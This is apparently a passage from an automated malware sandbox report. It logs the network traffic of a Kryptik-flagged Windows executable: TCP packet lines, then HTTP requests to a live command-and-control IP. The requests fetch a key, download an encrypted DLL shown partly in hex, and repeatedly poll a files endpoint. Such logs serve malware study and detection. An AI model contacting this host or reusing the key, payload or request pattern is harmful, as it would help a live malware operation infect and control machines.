                                                            Oct 8, 2024 10:08:45.240880966 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.240880966 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.240886927 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.240902901 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.240952015 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.240986109 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.241053104 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.241107941 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.244513035 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.244584084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.288959026 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.288971901 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.288988113 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289002895 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289010048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289025068 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289040089 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289130926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289146900 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289161921 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289177895 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289182901 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.289182901 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.289182901 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.289192915 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289208889 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289225101 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289239883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289256096 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289259911 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.289259911 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.289285898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.289304972 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.289504051 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289527893 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289542913 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289560080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289566994 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.289566994 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289576054 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.289592981 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.289700031 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.332638025 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.332851887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.375400066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.375410080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.375576019 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.375617981 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.375706911 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.375745058 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.375756025 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.375765085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.375776052 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.375806093 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.375838995 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.375941992 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.375952959 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.375969887 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.376003027 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.376034021 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.424770117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.424788952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.424804926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.424819946 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.424835920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.424855947 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.424858093 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.424870968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.424885988 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.424907923 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.424911022 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.424941063 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.424984932 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.425115108 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425129890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425143957 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425158978 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425167084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.425206900 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.425271988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425287962 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425321102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.425352097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.425460100 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425474882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425489902 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425504923 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425508976 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.425534964 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.425568104 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.425604105 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425620079 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425635099 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425653934 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.425678015 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.425781012 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425793886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.425834894 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.514220953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.514369011 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:50.015763044 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:50.015876055 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:10:06.456989050 CEST4973080192.168.2.480.66.75.114

                                                            HTTP Request Dependency Graph

                                                            • 80.66.75.114

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.44973080.66.75.114803152C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 8, 2024 10:08:09.341484070 CEST384OUTGET /name HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:10.086735010 CEST210INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:09 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 7
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 6d 69 78 6e 69 6e 65
                                                            Data Ascii: mixnine
                                                            Oct 8, 2024 10:08:10.121747017 CEST416OUTGET /add?substr=mixnine&s=three&sub=NOSUB HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:10.378456116 CEST203INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:10 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=99
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:10.383874893 CEST387OUTGET /dll/key HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:10.622387886 CEST224INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:10 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 21
                                                            Keep-Alive: timeout=5, max=98
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                            Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                            Oct 8, 2024 10:08:10.630323887 CEST392OUTGET /dll/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:10.876530886 CEST1236INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:10 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                            Content-Length: 97296
                                                            Keep-Alive: timeout=5, max=97
                                                            Connection: Keep-Alive
                                                            Content-Type: application/octet-stream
                                                            Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                                            Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                                            Oct 8, 2024 10:08:10.876602888 CEST224INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                                            Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(ucc
                                                            Oct 8, 2024 10:08:10.876666069 CEST1236INData Raw: f9 ad 67 76 17 ac ab 0b db 40 d6 4d bb cd 29 6e a5 f1 4c c0 34 97 4f a7 0e ef fc 69 77 78 64 69 c1 97 d8 e5 76 6d 29 51 42 65 a8 c4 f5 a2 34 c7 ba 35 61 41 aa 57 a4 b7 cf 8b 03 c3 a3 26 de 8a 41 ec 05 e5 7f c7 58 21 a7 f2 0c 7b c0 5b 44 1a 6d 43
                                                            Data Ascii: gv@M)nL4Oiwxdivm)QBe45aAW&AX!{[DmC(^_iPUrl9L"?2Z,+V:R&!HJqa&uv5"+o%P4@.vgAY#i?_$J8sQ^I#sn`G}HC
                                                            Oct 8, 2024 10:08:10.876676083 CEST1236INData Raw: b8 96 c1 6b 69 27 5c ee c7 f9 89 a8 9e 4c 34 d5 75 9d fe 61 ca 18 4d 6f 0d 99 bc 16 23 4a 4b fb 31 9f 78 59 bb 31 c6 42 c1 b8 db d8 d2 09 84 0e 37 cd 9f 81 56 19 9f 47 ef 83 60 3c 07 f7 1b 6f 60 ce ba f3 16 fe 3c 27 3e b4 51 bc dc c3 26 bf 0f df
                                                            Data Ascii: ki'\L4uaMo#JK1xY1B7VG`<o`<'>Q&Md42R32zD4:6vaG3~}safF4d|a.V6.qz$C'^Y'=C]YA'6mo@{# }YniEVoD"8*k;
                                                            Oct 8, 2024 10:08:10.876687050 CEST1236INData Raw: 9b 84 b6 11 05 74 f4 6a 29 ea 95 12 3e 4e c6 5d 07 8a 8c 6e 0a 29 df c0 d0 dc 61 4a f2 87 c7 57 b7 17 8a ec 0d 94 4d 28 cc 70 af e6 39 a5 16 63 ea 3d 97 af a2 e0 b5 f0 4d db 26 a7 ce 90 e4 a4 5d c2 5d 0e 75 5a 74 b9 53 4e 57 3f b4 a7 76 c9 b2 72
                                                            Data Ascii: tj)>N]n)aJWM(p9c=M&]]uZtSNW?vr>o+X<T<RvNdl:b=l{bK)06(]LiR(:'hbJ5}V78t4L7xqmFJ-rBCk1^u^Xe@bZ@%
                                                            Oct 8, 2024 10:08:10.876756907 CEST672INData Raw: 6c 07 1d c8 11 25 f2 1f 74 2d 83 1a ee 39 18 27 11 d8 19 a1 b5 bf 10 bd df 8b f4 fe 95 f6 97 67 5c 9b d1 1d 4d d2 1e e3 96 dc 44 87 9c e7 63 6c 14 6e 5a 9a 91 48 6d 6f 1d 74 74 9b 44 bc c1 38 4d d4 a2 a2 0b 5a 13 86 e8 70 1a 44 98 8f 4a ec 16 e7
                                                            Data Ascii: l%t-9'g\MDclnZHmottD8MZpDJ$ERJW'\VQMf.5gs6YQK-<2s{BSP|@M;l%&\~LIOk{1X4/bMMMw /c)F1{FsI`Fa7^2z
                                                            Oct 8, 2024 10:08:10.876769066 CEST1236INData Raw: e6 69 2d 49 51 f3 a4 d5 76 b0 82 cf 74 d1 85 19 f7 42 a9 78 eb 0b e9 01 32 e4 1d 91 61 e4 92 ad 68 8b f1 01 d1 83 62 ef 0e ea 87 d8 a0 66 e2 ec 6d df dc 97 39 57 94 e3 66 5a 2b 20 d1 43 cd 8a 07 04 20 9b 76 db 4c a6 9b 12 b9 0c 46 0b 2e ee 08 fc
                                                            Data Ascii: i-IQvtBx2ahbfm9WfZ+ C vLF.CXb<SK(R?X.!:YjJD^J[,x)<"kp /uTW56"An*M%b"P{$T#/6UC{XQ;,>=
                                                            Oct 8, 2024 10:08:10.876779079 CEST1236INData Raw: df fc 63 59 94 94 22 2e 6e b1 dd f8 1b 24 0c 47 af 41 b3 94 25 ae 63 05 68 cb 3a 78 6c 3a e6 0d fb 89 7f 8a 63 45 33 22 3e 37 2f cf bc bf dc 07 94 6d 6c 26 9b 2d c4 5a 8b a4 95 2b 63 98 62 c1 cf a5 66 8f c2 9e 15 af 99 71 41 93 5a 45 26 fd cf ad
                                                            Data Ascii: cY".n$GA%ch:xl:cE3">7/ml&-Z+cbfqAZE&j;{1:w\1`gub%gi&!3h+bn,awiHeKQZXrU)DT"->KTgx;1xY6#'BsZy
                                                            Oct 8, 2024 10:08:10.876790047 CEST1236INData Raw: ab 83 12 71 60 ef ac 34 32 d8 70 30 3b 55 9a 12 0e 9f 26 6c be 1f b1 56 29 68 86 1f 1c a5 97 2c 74 ca 37 9a 6a 55 f9 be e3 48 f7 00 72 6f 42 12 41 ec 23 16 2d cd d2 bf 20 52 76 63 2b 78 75 0d b1 13 ba b8 e6 b9 b1 8c 54 24 79 51 3b b2 29 1b ba 44
                                                            Data Ascii: q`42p0;U&lV)h,t7jUHroBA#- Rvc+xuT$yQ;)D<1:XRE^7ipg/]BYZ*e'0ZiU4Nk+@V,E*#LQ$iT{}@zFA8F /7B@57ARN"lU^-
                                                            Oct 8, 2024 10:08:10.876799107 CEST104INData Raw: 2b ed b6 90 93 b5 cb e9 5b 81 d3 0a ac cd 19 0a b7 db 61 4d 90 7d 85 3c 51 38 f9 08 b0 8a 2c 52 5c 3b a3 28 21 b4 b3 8b 95 1d cf 79 a5 e6 17 de 83 a8 dd 37 7c d0 40 73 1a 93 09 91 ed df 13 89 28 1d 8a d0 67 8b 19 59 81 4b 0b 18 94 db ad 26 01 9f
                                                            Data Ascii: +[aM}<Q8,R\;(!y7|@s(gYK&&n
                                                            Oct 8, 2024 10:08:10.877194881 CEST1236INData Raw: 42 de f2 9c 0c b4 3c 48 33 51 ba 68 2d fa 0a 05 e9 60 cd b0 cb f1 fe 83 75 4b 06 5e 54 47 06 e0 ea 0b 90 f3 c1 7b d1 af f4 dc 63 ee b1 c4 b5 b2 e7 ef e8 4b 0f 69 81 ab 46 a3 9b 7b 95 93 52 5f 9c 79 8f e9 8b d8 8a 7c 77 2e 93 ef d8 98 01 8e a5 79
                                                            Data Ascii: B<H3Qh-`uK^TG{cKiF{R_y|w.y0Pc-:gZdSw^P;$)SL'3{yC@XdTAiPDOF~&`M\iJSg\3?oNc8Hbnm0CWF5/lUo~x,3A[R
                                                            Oct 8, 2024 10:08:11.445183039 CEST394OUTGET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:11.692985058 CEST203INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:11 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=96
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:13.740324020 CEST394OUTGET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:13.987679958 CEST203INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:13 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=95
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:16.021287918 CEST394OUTGET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:16.262528896 CEST203INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:16 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=94
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:18.302316904 CEST394OUTGET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:18.550729036 CEST203INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:18 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=93
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:20.583638906 CEST394OUTGET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:20.835737944 CEST203INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:20 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=92
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:22.864959002 CEST394OUTGET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:23.123287916 CEST203INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:22 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=91
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:25.146970034 CEST394OUTGET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:25.395947933 CEST203INHTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:25 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=90
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:27.427881002 CEST394OUTGET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:27.661278009 CEST203INHTTP/1.1 200 OK
